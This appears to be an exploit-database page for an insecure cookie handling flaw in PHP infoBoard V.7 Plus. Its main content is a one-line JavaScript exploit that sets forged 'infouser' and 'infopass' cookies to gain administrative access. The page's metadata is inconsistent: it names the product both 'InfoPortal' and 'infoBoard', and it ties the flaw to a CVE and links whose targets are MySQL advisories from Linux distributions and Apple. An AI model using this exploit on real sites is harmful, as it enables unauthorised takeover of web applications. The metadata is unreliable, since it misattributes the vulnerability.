header-logo
Suggest Exploit
vendor:
InfoPortal V.7 Plus
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: InfoPortal V.7 Plus
Affected Version From: V.7 Plus
Affected Version To: V.7 Plus
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:infoportal:infoportal_v7_plus
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysql-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability

The vulnerability exists due to insecure handling of cookies in PHP infoBoard V.7 Plus. An attacker can exploit this vulnerability to gain administrative access to the vulnerable application.

Mitigation:

Upgrade to the latest version of PHP infoBoard V.7 Plus.
Source

Exploit-DB raw data:

###############################################################################################
[+] PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability
[+] Discovered By Stack               
[+] Greetz : All my freind              
################################################################################################
---
exploit:

javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";

# milw0rm.com [2008-09-25]

Navigation

Suggest Exploit

Services By CQR